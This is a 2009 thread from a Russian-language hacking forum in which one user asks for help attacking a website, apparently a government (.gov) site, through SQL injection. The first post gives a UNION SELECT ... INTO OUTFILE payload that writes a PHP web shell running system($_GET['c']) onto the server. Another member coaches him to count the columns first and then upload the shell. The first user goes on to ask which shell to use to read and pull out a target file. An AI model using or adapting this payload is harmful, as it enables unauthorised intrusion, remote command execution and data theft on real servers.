HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.08.2009, 23:14
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

L I G A,

ты это миел ввиду?

_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*
 
Ответить с цитированием

  #2  
Старый 19.08.2009, 23:34
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от serg-php  
L I G A,

ты это миел ввиду?

_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*
я имел ввиду сначала подобрать количество полей,
в твоем запросе это количество "null'ов"
дальше будешь видеть что и как ,и мб сможешь залить простой шелл как ты продемонстрировал на своем примере.
и на будущее: для таких вопроов есть отдельная тема тыц
 
Ответить с цитированием

  #3  
Старый 19.08.2009, 23:37
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Цитата:
и на будущее: для таких вопроов есть отдельная тема тыц
Буду знать!
 
Ответить с цитированием

  #4  
Старый 19.08.2009, 23:38
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Кол-во полей в таблице известно - 14 я насчитал!
 
Ответить с цитированием

  #5  
Старый 20.08.2009, 00:01
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от serg-php  
Кол-во полей в таблице известно - 14 я насчитал!
что то я сомневаюсь,я б для начала посаветовал тебе не пожалеть время а сесть и прочитать замечательную статью
Dr.Z3r0 о SQL INJECTION в разделе "наши статьи",если оно тебе действительно надо,а не надеятся на кого то.
 
Ответить с цитированием

  #6  
Старый 19.08.2009, 23:42
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Какой шелл посоветуете, чтобы прочесть искомый файл или слить его локально?

Последний раз редактировалось serg-php; 19.08.2009 в 23:47..
 
Ответить с цитированием

  #7  
Старый 20.08.2009, 00:28
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Читаю, пробую применить примеры от http://forum.antichat.ru/thread43966.html

Видимо фильтруется!
 
Ответить с цитированием

  #8  
Старый 21.08.2009, 16:26
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Очень сложно делать что-то впервый раз! Пытаюсь использовать изнания из статьи - не получается!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
МикроДжоинер для начинающих ReanimatoR Статьи 23 02.01.2010 15:07
Фейки dgonik777 Уязвимости Mail-сервис 34 14.06.2009 04:01
Файл рассылки. помогите настроить. mss-s PHP 10 09.05.2009 17:41
Помогите достать Shared Resource Scanner 6.2! n0lik Болталка 4 12.01.2009 15:09
Помогите открыть файл Sulf aka Joker Болталка 4 25.07.2006 21:59



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ